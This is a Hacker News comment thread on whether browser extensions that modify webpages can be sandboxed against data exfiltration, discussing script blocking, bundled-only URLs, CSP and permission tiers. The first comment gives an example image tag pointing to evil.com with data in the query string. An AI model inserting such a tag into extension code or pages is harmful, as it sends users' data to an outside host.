Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by for example adding a <img src=evil.com/?data=82374682376>.

Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.



Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.

Just don't let them create script elements, or add any URLs that don't come from within the extension bundle itself. Browsers already have to do a ton of bookkeeping to track the origins of requests anyway. Doesn't seem hard, you just have to be thorough.


Restricting the extension to pre-baked URLs means it takes several page loads to exfiltrate something, but doesn't stop it.


There would be ways to trick the original page into adding stuff for you.

For example, you could patch some of the original script of the page and wait for it to be run.


Couldn't CSP be used to limit which paths were valid URLs?

There could also be hierarchies of extension permissions, because they don't all need to be able to do everything.


extensions can also remove/add CSPs I think, either through modifying the header or modifying the DOM.


Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.




Consider applying for YC's Fall 2026 batch! Applications are open till July 27.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: